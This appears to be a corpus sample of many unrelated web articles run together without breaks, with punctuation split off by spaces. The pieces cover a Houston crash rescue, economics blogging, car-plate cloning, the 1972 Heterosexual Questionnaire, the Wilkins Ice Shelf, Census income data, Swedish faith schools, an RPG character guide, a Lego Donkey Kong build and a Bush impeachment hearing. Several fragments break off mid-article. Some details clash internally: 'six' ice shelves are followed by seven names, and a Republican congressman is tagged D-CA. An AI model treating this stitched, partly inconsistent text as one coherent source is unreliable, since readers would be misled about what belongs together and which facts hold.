Jones and a friend had just picked up her son from a country - western concert and were headed toward Wal - Mart on a Westpark feeder road when they saw the car leap off the tollway near U.S. 59 .
They stopped their car , called 911 and followed the smoke .
" We just ran , " said Jones , 42 , a former track and field star at the University of Houston .
She did n't expect to see anyone alive .
But when she neared the car , she saw movement .
Then she heard a woman screaming .
Jones and the two men , all of them strangers to each other , tried to pry the woman out , but she was pinned by the steering wheel inside the crumpled car .
Time was running out .
" The window was melting , " Jones said .
" The fire was coming in . "
Finally , Jones leaned in through the back passenger window and put her weight on the driver 's seat .
The woman slipped free , and the trio lifted her out the window .
Her leg was clearly broken ; the protruding bone was visible , stretching the skin .
Blood trickled from her mouth .
Jones carried her to a curb and sat down , cradling her in her arms , she said .
" I did n't know if she was going to live or die , " she said .
" I did n't want to put her on the ground . "
Jones spoke to her briefly and learned her first name .
The dark - haired woman was about 25 , Jones guessed .
The woman screamed until police and firefighters arrived and whisked her away in an ambulance .
It was the second time this month that Jones has crossed paths with police at a scene .
On Aug. 1 , she happened upon an arrest in progress outside a Third Ward gas station .
She approached police and said she had concerns that the suspect , wanted on charges of marijuana possession , was being mistreated .
The officers accused her of interfering with an arrest .
This time , she said , one officer expressed gratitude .
" He said , ' You saved her life , ' " she recalled Sunday afternoon .
But , she said , he told her the woman might have suffered massive internal injuries from the 100 - foot fall .
Houston police Capt .
Bruce Williams declined to comment Sunday on the specifics of the accident .
Jones said anxiety kept her awake all night .
She went to the Ben Taub Hospital emergency room Sunday morning to check on the woman .
She could only tell them the woman 's first name and the details of the crash .
They knew who she meant .
" They said , ' Yes , ma'am .
She 's alive . ' "
jennifer.latson@chron.com
" When I studied economics we were told we would be masters of the universe .
Ours was not a dismal but a noble science .
It had harnessed the verities of maths to those of human behaviour and would go on to conquer politics .
Rampant recession would go the way of hyperinflation .
Like leprosy and cholera , they were epidemics that modern medicine had rid from our shores . "
Via Anthony Mueller 's Continental Economics
Blog
I see the following interesting column by Simon Jenkins , where he like John McCain indicts [ the majority of ] economists for their failure to predict the current problems .
And then he goes one to describe to how economists have failed in this , whereupon he concludes that economics is not a science and that ultimately political considerations should determine economic policy .
I agree with some of this .
Certainly neoclassical economists have failed miserably in trying to predict the economy , " despite " their allegedly " scientific " approach of expressing economic theories in the forms of Greek letters analyzed through Lagrange multipliers .
And certainly , human behavior and therefore economic aggregates doesn ' treally function that way and so attempts to do it will fail .
And I also agree that there is more to political decision making than economics .
Economics can only describe what outcomes will follow if you follow certain policies .
It does n't say anything whether those outcomes are desirable or not .
However , I would disagree in his view that economics should be entirely dismissed from economic decision making .
Because he believes , based on the failure of neoclassical economics , that economics can't describe the consequences of various policies .
Yet even neoclassical economics can sometimes do that , even if they for ridiculous reasons express it in terms of Greek letters .
And Austrian economists can usually describe the consequences of various policies .
In short : the current crisis does indeed expose the shortcomings of neoclassical economics .
But that should n't be taken as a pretext to reject all economics , considering that there has been one school of economics who have predicted the current mess .
Some New Zealand rugby fans were shocked by unexpected pornography
New Zealand rugby fans watching a regular sports programme found themselves viewing hardcore pornography instead on Sunday afternoon .
Four minutes of pornography interrupted sports coverage on the Prime Television channel , after what a spokesman described as a distribution mix up .
The pornographic footage was meant for an adult pay - per - view channel .
Instead , it found its way onto a regular free - to - air programme called Grassroots Rugby .
Rival television channels reported that some viewers were angry about the broadcast , which may have been seen by children .
Car and number plate cloning is on the up
Make no mistake , this is no minor problem .
And what 's worse is that any of us could fall victim to this crime , without even knowing it .
The Telegraph claims up to 8 % of cars have cloned number plates .
I 'd say that was a bit of an exaggeration to grab the reader 's attention .
Especially if you look at their definition of cloning , which I would argue is not actually correct .
Nevertheless , it 's still a very real problem , that can ( at the very least ) cause the rest of us a bit of a headache .
At worst , we could end up considerably out of pocket or even with the police knocking at our door .
So what exactly is car cloning ?
The phrase " car cloning " basically means passing off a car with the identity of another ( using the car registration number ) .
Usually , this is done using the same make / model / colour of the original vehicle .
It 's done by either having number plates made up or by stealing number plates from someone else 's car .
Think it 's a minor crime ?
Think again .
Who clones cars and number plates ?
Cars are cloned by criminals to commit a variety of offences .
Crimes can include selling stolen cars by making them look like legitimate cars .
If you 're buying a vehicle privately , make sure you do some checking before parting with cash .
The Heterosexual Questionnaire was created back in 1972 to put heterosexual people in the shoes of a gay person for just a moment .
Questions and assumptions made of Gays and Lesbians that are unfair , are reversed and this time asked to the straight people .
This is a fun survey , but also an activist survey .
Please repost this to your email list , myspace bulletin , use it in a group setting , have fun with it but also let the point be made .
1 . What do you think caused your heterosexuality ?
2 . When and where did you decide you were a heterosexual ?
3 . Is it possible this is just a phase and you will out grow it ?
4 . Is it possible that your sexual orientation has stemmed from a neurotic fear of others of the same sex ?
5 . Do your parents know you are straight ?
Do your friends know - how did they react ?
6 . If you have never slept with a person of the same sex , is it just possible that all you need is a good gay lover ?
7 . Why do you insist on flaunting your heterosexuality ... ca n’t you just be who you are and keep it quiet ?
8 . Why do heterosexuals place so much emphasis on sex ?
9 . Why do heterosexuals try to recruit others into this lifestyle ?
10 . A disproportionate majority of child molesters are heterosexual ...
Do you consider it safe to expose children to heterosexual teachers ?
11 . Just what do men and women do in bed together ?
How can they truly know how to please each other , being so anatomically different ?
12 . With all the societal support marriage receives , the divorce rate is spiraling .
Why are there so few stable relationships among heterosexuals ?
13 .
How can you become a whole person if you limit yourself to compulsive , exclusive heterosexuality ?
14 . Considering the menace of overpopulation how could the human race survive if everyone were heterosexual ?
15 . Could you trust a heterosexual therapist to be objective ?
Do n't you feel that he or she might be inclined to influence you in the direction of his orher leanings ?
16 .
There seem to very few happy heterosexuals .
Techniques have been developed that might enable you to change if you really want to .
17 .
Have you considered trying aversion therapy ?
- Martin Rochlin , Ph.D. , 1972
Antarctic ice shelf ' hanging by thread ' : European scientists Agence France - Presse
Published : Thursday July 10 , 2008
Print This Email This New evidence has emerged that a large plate of floating ice shelf attached to Antarctica is breaking up , in a troubling sign of global warming , the European Space Agency ( ESA ) said on Thursday .
Images taken by its Envisat remote - sensing satellite show that Wilkins Ice Shelf is " hanging by its last thread " to Charcot Island , one of the plate 's key anchors to the Antarctic peninsula , ESA said in a press release .
" Since the connection to the island ... helps stabilise the ice shelf , it is likely the breakup of the bridge will put the remainder of the ice shelf at risk , " it said .
Wilkins Ice Shelf had been stable for most of the last century , covering around 16,000 square kilometres ( 6,000 square miles ) , or about the size of Northern Ireland , before it began to retreat in the 1990s .
Since then several large areas have broken away , and two big breakoffs this year left only a narrow ice bridge about 2.7 kilometres ( 1.7 miles ) wide to connect the shelf to Charcot and nearby Latady Island .
The latest images , taken by Envisat 's radar , say fractures have now opened up in this bridge and adjacent areas of the plate are disintegrating , creating large icebergs .
Scientists are puzzled and concerned by the event , ESA added .
The Antarctic peninsula -- the tongue of land that juts northward from the white continent towards South America -- has had one of the highest rates of warming anywhere in the world in recent decades .
But this latest stage of the breakup occurred during the Southern Hemisphere 's winter , when atmospheric temperatures are at their lowest .
One idea is that warmer water from the Southern Ocean is reaching the underside of the ice shelf and thinning it rapidly from underneath .
" Wilkins Ice Shelf is the most recent in a long , and growing , list of ice shelves on the Antarctic Peninsula that are responding to the rapid warming that has occurred in this area over the last fifty years , " researcher David Vaughan of the British Antarctic Survey ( BAS ) said .
" Current events are showing that we were being too conservative , when we made the prediction in the early 1990s that Wilkins Ice Shelf would be lost within 30 years .
The truth is , it is going more quickly than we guessed . "
In the past three decades , six Antarctic ice shelves have collapsed completely -- Prince Gustav Channel , Larsen Inlet , Larsen A , Larsen B , Wordie , Muller and the Jones Ice Shelf .
Each week I share solutions to your real - world challenges , unpacks future - looking opportunities , and highlights frameworks to inspire you to think smart , move fast .
Autoplay next video
Had he and I but met
By some old ancient inn ,
We should have set us down to wet
Right many a nipperkin !
But ranged as infantry ,
And staring face to face ,
I shot at him as he at me ,
And killed him in his place .
I shot him dead because --
Because he was my foe ,
Just so : my foe of course he was ;
That 's clear enough ; although
He thought he'd ' list , perhaps ,
Off - hand like -- just as I--
Was out of work -- had sold his traps --
No other reason why .
Yes ; quaint and curious war is !
You shoot a fellow down
You 'd treat , if met where any bar is ,
Or help to half a crown .
Enlarge By LM
Otero , Associated Press EDS is based in the USA 's most affluent city , Plano , Texas .
What 's the most affluent city in the USA ?
( a ) San Jose ( b ) San Francisco ( c ) Honolulu ( d) Plano , Texas
The answer is Plano — and that surprises even the mayor of this 260,000 - person Dallas suburb .
" I 'd never heard that before , " Plano Mayor Pat Evans says .
" But it 's good to know . "
The Census Bureau released its annual report on income and poverty Tuesday .
The results offer an interesting — and often unexpected — portrait of who 's rich and who 's poor in the USA .
Plano was the report 's star among cities with populations of 250,000 or more .
It had the highest income and lowest poverty rate .
Plano 's median household income in 2007 was $ 84,492 , up 10 % from 2006 .
Placing a distant second : San Jose , with a median income of $ 76,963 .
CENSUS : Uninsured total shrank , incomes rose in 2007 EXPERTS : Economy may stall push for health care Plano is the home to corporate headquarters for Frito - Lay , JCPenney and other companies .
Billionaire Ross Perot founded computer giant EDS and Perot Systems , both still based in Plano .
The city is north of Dallas at the end of a light - rail line .
Gymnast Nastia Liukin , Olympic gold medalist in Beijing , trains there .
Despite its affluence , the median home price is about $ 225,000 , Evans says .
By contrast , San Jose 's median home price is $ 744,000 .
" We 've got the lowest taxes and highest level of services in North Texas , " the mayor says .
The poorest city in the nation was Detroit , with a median household income of $ 28,097 .
It fell to the bottom spot this year , replacing Cleveland .
The Census Bureau report also showed : • States .
Maryland remained the top state in income , and Mississippi remained the poorest .
Energy states Alaska and Wyoming had the biggest income gains .
Four states lost ground : Michigan , Kentucky , New Mexico and South Dakota .
• Congressional districts .
Rep. Tom Davis , R - Va. , who represents suburbs outside Washington , has the most affluent constituents .
Their median household income was $ 103,664 .
Rep. José Serrano , D - N.Y. , who represents Harlem and the Bronx in New York City , has the district with the poorest residents .
Median household income was $ 23,291 .
• Regions .
Income grew in the South and Midwest .
It fell in the Northeast and did not change in the West .
Guidelines :
You share in the USA TODAY community , so please keep your comments smart and civil .
Do n't attack other readers personally , and keep your language decent .
Use the " Report Abuse " button to make a difference .
You share in the USA TODAY community , so please keep your comments smart and civil .
Do n't attack other readers personally , and keep your language decent .
Use the " Report Abuse " button to make a difference .
Read more
ROTTERDAM , the Netherlands 
The Dutch are building windmills again .
Up and down the coast , out from port cities like this one , you can see them : white and tall and slender as pencils , their three slim blades turning lazily in the North Sea breeze .
These generate electricity , of course , rather than grind grain .
The government has already built one enormous farm of mills far off the coast , where they ’re inoffensive to tourists , and there are plans for a second farm .
Yet it is also building , and rebuilding , mills like the squat , homely ones that have seemingly always dotted the Dutch countryside , and reflect as much the nature of the country as do tulips or Gouda cheese .
“ Revival might be a bit strong , ” said Leo Endedijk , director of the Dutch Mills , a group that supports mill restoration .
Yet last year the government , concerned that one of the foremost symbols of the Netherlands was about to disappear out of neglect , approved an $ 80 million program to build or restore 120 mills , of roughly 1,040 still standing .
That has created a backlog of work for previously strapped mill restorers .
“ We have special companies , very specialized mill makers and restorers , ” said Mr. Endedijk , in an office in the shadow of De Gooyer , a soaring 18th - century mill now housing a popular brewery .
“ They would not have the capacity to restore 120 mills . ”
IF YOU thought that breast milk must taste rather bland , think again .
Human milk provides a veritable cornucopia of different flavour combinations that may prime a child to try new foods later on .
Previous studies suggested that what a mother eats can affect the taste preferences of her child .
For example , the infants of mothers who drank carrot juice during pregnancy or breastfeeding seemed to prefer carrot - flavoured cereal .
To get a handle on how flavours from a mother ’s diet get transferred into her milk , Helene Hausner and her colleagues at the University of Copenhagen in Denmark asked 18 lactating mothers …
The Swedish government has announced plans to clamp down hard on religious education .
It will soon become illegal even for private faith schools to teach religious doctrines as if they were true .
In an interesting twist on the American experience , prayer will remain legal in schools - after all , it has no truth value .
But everything that takes place on the curriculum 's time will have to be secular .
" Pupils must be protected from every sort of fundamentalism , " said the minister for schools , Jan Björklund .
Creationism and ID are explicitly banned but so is proselytising even in religious education classes .
The Qur'an may not be taught as if it is true even in Muslim independent schools , nor may the Bible in Christian schools .
The decision looks like a really startling attack on the right of parents to have their children taught what they would like .
Of course it does not go so far as the Dawkins policy of prohibiting parents from trying to pass on their doctrines even in their own families - and , if it did , it would certainly run foul of the European convention on human rights .
It does not even go as far as Nyamko Sabuni , the minister for integration - herself born in Burundi - would like : she wanted to ban all religious schools altogether .
But it is still a pretty drastic measure from an English perspective .
The law is being presented in Sweden as if it mostly concerned fundamentalist Christian sects in the backwoods ; but the Christian Democratic party , which represents such people if anyone does , is perfectly happy with the new regulation .
There is little doubt that combating Islamic fundamentalism is the underlying aim , especially in conjunction with another new requirement that all independent schools declare all their funding sources .
This would allow the inspectors - whose budget is being doubled - to concentrate their efforts on those schools most likely to be paid to break the rules .
In the background to these announcements comes the release of a frightening documentary film on Swedish jihadis , which follows young men over a period of two years on their slow conversion to homicidal lunacy .
The question is whether we in Britain will come to see this as a necessary move in the struggle to contain Islamist ideologies .
Can a defence of freedom convincingly be mounted by a state that takes such a firm view of what is or is not true ?
Or can freedom not be preserved without such measures ?
The dilemma makes no sense from a completely liberal position , where it is assumed that the truth will always win out in fair competition , and that the state is almost always to be distrusted .
But Swedes have never really been liberal in that sense , notwithstanding the fact that the two ministers involved here are members of the Liberal party .
Superficially , the British position could not be more different .
The British government 's strategy with Islam or protestant extremism in Ulster has been - so far as we have had one - flattery and corruption , or what Microsoft , in another context , calls " embracing and extending " .
Find the leaders , flatter them , and draw them into the ruling class in the hope that they will then cooperate and see that their followers do too .
The gamble that the government is taking on faith schools is that if religious groups are given their own schools to run , they will do so in ways that will turn out for the benefit of society as a whole , as well as of their pupils .
Certainly this works quite well with the Church of England .
Anglican schools are happy , by and large , to teach religion as if it were not true ; to put it in a more flattering light , they concentrate more on the fruits of the spirit than on dogma .
However , no one supposes that society is threatened by a terrorist movement nurtured in C of E primary schools .
Demanding that Muslim , Jewish , and Catholic schools stop teaching their own religions as if they were true , which is essentially the Swedish position , looks an impossible task for a British government .
But I think it might also be a necessary one .
It is certainly the only way to discover whether the parents of such schools really want the " ethos " or the pseudo - factual beliefs and what exactly it is that the people who fund them think they are buying with their money .
Greetings and welcome to Ash’s Guide
to RPG Personality & Background
In my experience , what makes role playing games so fun is the role playing !
Yes , high pitched battles are a blast , but can get stale when that ’s the meat of the experience .
Developing and running a character that , over time , really comes to life makes gaming rewarding because eventually you get to know and care about this creation that is , ultimately , an extension of yourself .
And so , this guide was developed for gamers like myself who enjoy playing complex characters with a unique personality and background .
This guide is designed to be modular , meaning you should only use the sections you need when you need them .
You certainly do n’t need to fill out every item , especially in the beginning when you just want to get your character up and running .
Let me repeat :
The Guide does not require that every variable be assigned .
You can start off with only one or two variables in the beginning and add more as you get to know your character or as questions arise .
Of course , you are welcome to start off with a complete personality and background profile ; it ’s entirely up to you .
Either way , I hope you find The Guide useful for enriching your gaming experience .
Personality ( part 1 )
When we talk about personality in a gaming context , what we want to know are things like a character ’s motivations , emotional states , worldview , and how s/he behaves in various situations .
Alignment often does n’t go far enough in answering these questions .
Richness in a campaign often comes in the form of small details , quirky events , and surprising action , all of which are more possible when the characters ( including the NPCs ) have personality elements that make for non-general play .
For instance , a thief can certainly be played to pickpocket everyone indiscriminately , but it is more interesting if she , say , also loves to read and goes out of her way to steal books .
It is this kind of insight about what makes a character tick that allows for really fun and engaging adventures .
The percentages in this Guide are for random profiles , which might be interesting for NPC development .
For player characters , gamers are encouraged to pick and choose the traits as they see fit .
Step 1 : Primary Motivators
In the broadest sense , the Primary Motivator is the underlying engine of your character ’s life .
It is the foundational theme of his worldview and , at a deep level , is what ultimately drives him to action .
While any given act might be tactically pragmatic in service to short - term goals , the PM is there in the background influencing his aims and behaviors .
A single Primary Motivator is entirely sufficient and even if you want more , it is recommended to begin only with one .
If you are inspired to have multiple Motivators , I suggest you still choose one that is primary with others that are secondary .
This is n’t presented as a rule , it ’s just experience — the more PMs you have , the less meaningful they become in your gaming .
In general , I ’ve found it more interesting and playable to go deeper with one motivator rather than broader with more PMs .
PRIMARY MOTIVATORS 1 - 3 % Achievement
To overcome obstacles and succeed ; to become the best 4 - 6 % Acquisition To obtain possessions / wealth 7 - 9 % Adoration
To be cherished , admired , and wanted by others 10 - 12 % Balance / Peace
To bring all things into harmony and equilibrium 13 - 15 % Beneficence
To protect the helpless , heal the sick , feed the hungry , etc. 16 - 18 % Chaos
To disrupt , to cause confusion and discord 19 - 21 % Competition
To seek out or create rule - based win / lose scenarios ; to defeat others in contests 22 - 24 % Conflict
To seek out or create rivalry , fighting , or animosity 25 - 27 % Conquest
To conquer other peoples , to bring them into one ’s own culture / rule 28 - 30 % Corruption
To despoil , ruin , humiliate , or make depraved 31 - 33 % Creation
To build or make new , such as art , culture , invention , design , etc. 34 - 36 % Destruction
To annihilate , exterminate , and unmake 37 - 39 % Discovery / Adventure To explore , uncover mysteries , and pioneer 40 - 42 % Domesticity
To get married , have children , and live a family life 43 - 45 % Education
To provide information , teach , enlighten , or train 46 - 48 % Entertainment
To entertain , amuse , and delight others 49 - 51 % Enslavement
To force others into servitude 52 - 54 % Hedonism
To enjoy all things sensuous 55 - 57 % Heroism
To find valor and honor through battle or self - sacrifice 58 - 61 % Liberation
To free the self and / or others from perceived captivity or enslavement 62 - 64 % Love To experience / share affection and emotional commitment , whether romantic or platonic 65 - 67 % Nobility / Honor
To exalt ideals such as generosity , honesty , bravery , and courtliness 68 - 70 % Order To arrange , organize , and reduce chaos 71 - 73 % Play To have fun , to enjoy life 74 - 76 % Power To control and lead others 77 - 79 % Proselytization
To spread a belief system ; indoctrinate others 80 - 82 % Purity
To achieve a state of moral or spiritual perfection , of self and / or others 83 - 85 % Rebellion
To fight against power structures ; to undermine authority 86 - 88 % Recognition
To gain approval , social status , or fame 89 - 91 % Service
To follow a person , government , order , religion , etc. 92-94 % Torment
To inflict pain and suffering , on others and / or the self 95 - 97 % Understanding
To seek knowledge or wisdom ( spiritual , scientific , magical , etc ) 98-100 % Vice
To enable or engage in self - destructive behavior
You are certainly not limited to the choices above — but if you create your own Motivator , be sure to make it generalizable and thematic .
You do n’t want a PM that is actually a Quest or a Hobby .
For instance , Competition is something that can motivate a character in many situations and across the lifetime , but Revenge does n’t work well because it ’s more of a Quest .
But if one does want revenge , the flavor of it will be influenced by the PM — you can imagine how it might manifest differently if the character ’s PM is Beneficence , Destruction , Liberation , or Torment .
You can also choose a narrower version of the listed options .
For example , Invention rather than the more general Creation , or try Popularity rather than Recognition .
Just be careful not to make it too narrow .
And if you do pick a narrow Motivator , you are encouraged to pick at least one other PM , just to keep your character from a too - restricted range of action .
Step 2 : Emotion and Core Traits
Now we start to fill in some details about what your character is like .
We want to know how she feels and thinks , ultimately so we can determine how she will behave .
Emotional Disposition and Moodiness
We begin with the Emotional Disposition and Moodiness .
The ED describes the general emotional set or “ resting state ” of the character .
This does n’t mean that the character is limited to the ED , it just informs you of the emotion the character is most likely to be experiencing at any given time .
This trait can be used to help you determine how your character is likely to emotionally respond to a situation , as well as how she appears to others .
For instance , a primarily joyous person will act and speak differently than one who tends towards anxiety or contempt .
Finally , do n’t make the mistake of correlating the ED with alignment — it is possible to be joyously evil and angrily good .
Moodiness describes how easily one feels strong emotion .
It ’s basically the level of emotional stability .
Labile describes being quick to experience strong emotions and Phlegmatic describes being emotionally steady and low - key .
EMOTIONAL DISPOSITION 1-10 % Joyful 51 - 60 Angry 11 - 20 Anxious 61 - 70 Contemptuous 21-30 Melancholy 71-80 Excited 31 -40 Curious 81-90 Apathetic 41-50 Calm 91-100 Ashamed MOODINESS 1-33 % Labile ; 34 - 66 Even- tempered ; 67-100 Phlegmatic
Core Traits
Where the Primary Motivator describes the global drive of your character , the Core Traits inform how a character is likely to act in any given situation .
They help define how a character sees the world and how they move within it .
For players who do n’t need much personality detail , picking out a Primary Motivator , the key Emotional Disposition , and even one or two Core Traits should be enough to give any character a distinct flavor .
While all such traits in reality have a wide spectrum of expression , for the sake of gaming simplicity , they have been divided into black and white categories .
Even so , this should not stop you from finding the shades of grey during gameplay .
1. OUTLOOK Outlook is one ’s basic worldview , interpreting the world as being essentially good or bad .
Optimistic
Idealistic , confident , trusting , hopeful , upbeat Pessimistic
Cynical , bleak , distrustful , foreboding , resigned
2. INTEGRITY
Basic values regarding work and social interactions .
Conscientious
Industrious , honest , responsible , meticulous , pragmatic Unscrupulous
Lazy , deceitful , unreliable , manipulative , slipshod , impractical
3. IMPULSIVENESS
The ability to regulate one ’s thoughts and actions .
Controlled
Deliberate , focused , steady , thoughtful Spontaneous
Capricious , flighty , hyperactive , rash
4. BOLDNESS Willingness to face danger and enter into battle .
Intrepid
Daring , reckless , valorous , dauntless , audacious , confident Cautious
Timid , paranoid , vigilant , nervous , tentative
5. AGREEABLENESS
General attitude towards people and the ability to handle new situations , tough choices , and interpersonal conflicts .
Agreeable
Warm , empathic , tolerant , forgiving , open - minded , adaptable , altruistic Disagreeable
Cold , rigid , tense , intractable , narrow - minded , cantankerous , stingy
6. INTERACTIVITY
Style and degree to which your character interacts with others .
Engaging
Talkative , candid , entertaining , touchy Reserved
Shy , loner , taciturn , evasive , cryptic
7. CONFORMITY
Basic relationship with cultural norms .
Conventional
Orthodox , formal , down - to - earth , mainstream , traditional Heterodox
Rebellious , arty , shocking , freethinking , exotic
The Basic Profile
Determining the Primary Motivator , Emotional Disposition , Moodiness , and Core Traits will give you a solid personality profile for your character , covering almost any situation she might get into .
Let ’s look at an example :
Primary Motivator : Liberation Impulsiveness : Controlled Emotional Disposition : Melancholy Boldness : Intrepid Moodiness : Phlegmatic Agreeableness : Disagreeable Outlook : Pessimistic Interactivity : Reserved Integrity : Conscientious Conformity : Heterodox
This is the profile of a character — let ’s say a fighter — that is driven to save all those in servitude .
She despises the notion of anyone in captivity .
Knowing that the world is filled with slaves , she tends to sadness in her demeanor .
However , she is also emotionally stable — it takes a lot to really upset her .
She is somewhat pessimistic and is very slow to trust anyone .
As such , she can come across as somewhat cold and even cantankerous on occasion ; it does n’t help that she reveals very little about herself .
Although she is n’t impulsive , she is brave and will fight to the end if she feels her cause is just .
And she is n’t interested in tradition or the powers that be — she goes her own way .
As you can see , just these ten items are able to generate a detailed and playable profile .
But perhaps you want more ?
Well , then , let ’s move on to Personality Part 2 …!
Push -ups and the Internet usually do n’t go together , much to the regret of doctors .
In China , though , they ’re both part of the newest meme , sort of a protest against a government that insists on one version of the story no matter what .
Seventeen - year - old Li Shufen died in June in Guizhou provence .
She had been traveling with two men and a 16 - year - old girl , who Li ’s family say played a part in her death , maybe even raping and murdering her .
The China Daily reports
Li ’s brother says he saw injuries on her face .
The government has a different story .
It says Li did two push - ups , said something like , “ I ’m going to leave , ” then jumped off a bridge to her death .
The official report on Li Shufen ’s death sparked a riot in Guizhou , and while the investigation continues , the strange two push - up story took on a life of its own .
Celebrities ( in China ) posed for pictures doing push - ups .
Web comments mixed push - ups into famous phrases , like “ To push - up or not to push up , that is the question . ”
Several thousand people joined groups with push - up as a keyword .
The Chinese government added push - up as a censored phrase just a day or two later , but word still got out .
That ’s why you ’re reading it here .
THE US has a big waste problem and , officially at least , recycling is
seen as one of the best solutions .
Twenty - five states now have laws mandating
some type of recycling .
Eight of these aim to reduce the flow of domestic
waste by between 15 and 30 per cent within a few years .
Connecticut , most
ambitious of all , will forbid the incineration or disposal by landfill of
any recyclable item from 1991 .
‘ Reverse vending ’ machines swallow used
cans and bottles and automatically credit the manufacturer with a return .
But one archaeologist thinks that the US may be recycling some of its discarded
materials for the wrong reasons .
William Rathje of the University of Arizona specialises in rubbish tips ,
rather than the sites of ancient civilisations .
His team of archaeologists ,
microbiologists and chemists has so far dug into seven sites across the
US .
They apply established archaeological techniques of ‘ layered ’ excavation
to cut a cross-section into a landfill , then sort the refuse taken from
the cross-section into categories .
They can tell how old each layer of refuse
is by its depth in the landfill and from changes in the design of , for example ,
Coca -Cola bottles .
‘ Sell - by ’ dates and newspapers give more accurate information
and are still legible even when they are 40 or 50 years old .
Waste disposal and recycling authorities commissioned the digs to find
out precisely what people in the US throw away and what then happens to
the refuse .
‘ Much of the information used to formulate solid waste policies
– what we think is in landfills and what happens to it over time – may be
based more on fantasies than …
There ’s No Free Lunch , or Money
Lord knows most people are not as financially literate as they should be .
But that does n’t mean we have to see financial illiteracy even when it does n’t exist .
In Britain , the price - comparison website moneysupermarket.com hired people to stand on the sidewalk offering to give anyone who asked a free £ 5 note , with no obligations or restrictions .
Out of 1,800 people , only 28 accepted the offer .
What does this mean ?
According to a press release :
“ This exercise reveals a fundamental inertia which is stopping people from making sensible financial decisions , ” said Tim Moss , head of loans and debt at moneysupermarket.com .
“ This was a completely genuine , no strings attached offer .
People simply had to approach the sandwich board wearer and ask for a fiver .
If more than 98 percent of the people who passed by could n’t be bothered to do that , it raises some interesting questions about what needs to be done to persuade people to make an effort to improve their financial positions .
Would anyone else like to join me in calling B.S. on moneysupermarket.com ?
Take a look at this picture of the guy who ’s offering the money .
His hand - lettered sandwich board says “ If you ask me for a £ 5 note you can have one . ”
Does that really look like a “ completely genuine , no strings attached offer ? ”
Aside from the fact that the gentlemen looks a bit — well , un - banker - like — this is not at all the equivalent of setting a stack of £ 5 notes on a table and giving them away .
At the very least , you ’re going to have to talk to this guy .
And a reasonable expectation is that the conversation may cost you something , whether in time , annoyance , or perhaps worse .
Did the people who avoided this guy really exhibit a “ fundamental inertia ” or were they just smart enough to know that there ’s no such thing as a free lunch — or free money ?
( Aside : our resident quote bleggar Fred Shapiro , filling in for William Safire , let us know this weekend that Milton Friedman did n’t coin the “ no free lunch ” phrase . )
( Hat tip : Rich K. )
Lego .
Mindstorms RCX .
Donkey Kong .
Rolling barrels .
Donkey Kong throws rolling barrels .
Mario jumps .
And jumps .
And jumps .
All synchronized .
Dan Kressin even generated the game start tune with Lego .
After seeing it in action - and hearing the rattling noise it makes - I want this on the wall of my bedroom , as my alarm clock .
Videos and high res pictures after the jump .
Updated with comments by the author .
Advertisement
JD : How long did it take , total ?
DK : Fudging the math here .
About 3 months start to finish , working probably an average of an hour a day ( more on the weekends , less during the week ) .
110-120 hours probably is n't too far off .
Advertisement
JD : Do you think , given enough time , you could use Mindstorms to recreate the arcade for real ?
I mean , controlling Mario travelling across the screen to the top .
Too complicated ?
DK : I 've gotten this question a few times now ..
It might be possible with some sort of magnet - behind - the - wall system , but it 's not something I 'll be able to attempt .
I 'd like to keep my wife .
G/O Media may get a commission LG 75 - Inch 8K TV Buy for $ 2150 from BuyDig Use the promo code ASL250
JD : Any plans to do other games ?
DK : I have some ideas for Ms Pacman , but it 's still in the brainstorming stages .
No promises ..
Advertisement
Advertisement
Advertisement
Advertisement
Advertisement
[ Vib via Brothers Brick ]
Bush Accused of Tyranny and Murder
Vincent Bugliosi ( Right ) and Bruce Fein ( left ) at Judiciary Committee hearing on Imprachment of George W. Bush
( Image by Michael Collins ) Details DMCA
House Justice Committee Hears Kucinich Resolution
Direct from the hearing
Michael Collins
Washington , DC Part 1 ( Also see Part 2 )
Today 's hearing on the abuse of presidential powers before the House Committee on the Judiciary turned into a devastating political ambush by Chairman John Conyers ( D - MI ) , committee Democrats , and the extraordinary panel of witnesses ..
At least 12 Democratic Committee members were present plus the Chairman while only four Republicans bothered to show up .
Belying their casual appearance in the committee chambers , the Democrats presented a well coordinated , hard hitting case against President George W. Bush .
This led to a double climax in the form of surgically erudite testimony by conservative legal scholar Bruce Fein , a former Reagan administration official , and former Los Angeles District Attorney Vincent Bugliosi 's stunning summary statement .
The best the Republicans could offer was inappropriate humor by Rep. Dan Lungren ( D - CA ) and a request to clear the chambers when the audience cheered Mr. Bugliosi 's remarks .
The hearing resulted from the non stop campaign for the impeachment of President George W. Bush by Rep. Dennis Kucinich ( D - OH ) .
That effort received an overwhelming endorsement last week with the votes of a 238 majority in the U.S. House of Representatives .
The 229 Democrats and 9 Republicans voted to refer the single count impeachment bill to the House or Representatives Committee on the Judiciary chaired by Rep. John Conyers ( D - MI ) .
The Kucinich Resolution - H.R. 1345 outlines the case for the impeachment of President Bush .
Specifically , as president , Bush :
" Deceived Congress with fabricated threats of Iraq Weapons of Mass Destruction ( WMD ) to fraudulently obtain support for an authorization for the use of force against Iraq and used that fraudulently obtained authorization , and then acting in his capacity under Article II , Section II of the Constitution as Commander in Chief , to commit US troops to combat in Iraq . "
There was speculation prior to the hearing that the Republicans might scuttle the entire process due to House rules that prevent disparaging comments about the president .
Apparently they failed to read the entirety of House Practice , Sec. 25 which lists a number of negative comments that House members have used in the past and makes clear that they 're available in the present .
" Few Issues More Important "
Chairman Conyers opened the hearing by noting that there are " few issues more important " than the actions of Congress to curtail the abuse of presidential powers .
As a member of the House committee that heard the Nixon Impeachment case , he speaks with a certain authority .
He listed the various abuses of presidential power by Bush laying out the case that his fellow Democrats would elaborate .
The senior member of the committee , Republican Lamar Smith ( R - TX ) responded that he'd seen a lot from this committee but today 's hearing was like " hosting an anger management class . "
Rep. Robert Wexler ( D - FL ) , a strong advocate for the hearings , responded by pointing out that given the evidence of high crimes , this is n't a Democratic or Republican issue , it 's an American issue .
The Democrats continued the theme of gravity with Cong. Zoe Lofgren ( D - CA ) referring to Bush as " the worst president our country has ever suffered "
Cong .
Sheila Jackson Lee ( D - TX ) returned to what would lead to the most devastating and startling charges of the hearing - the basis for the invasion of Iraq and the disregard for civil liberties through the torture of foreigners and the domestic assault on privacy .
Rep. Trent Franks ( R - AZ ) responded that the hearing was nothing but " a do - over that amuses our terrorist friends . "
Next Page 1 | 2
( Note : You can view every article as one long page if you sign up as an Advocate Member , or higher ) .
A question I ’m often asked is whether military action against Iran is still an option for the Bush administration .
The short answer is " yes . "
Last week , when a reporter raised the issue of " a spate of recent stories about possible military action against Iran before the end of the year " President Bush responded that " the first option for the United States is to solve this problem diplomatically " but that " all options are on the table . "
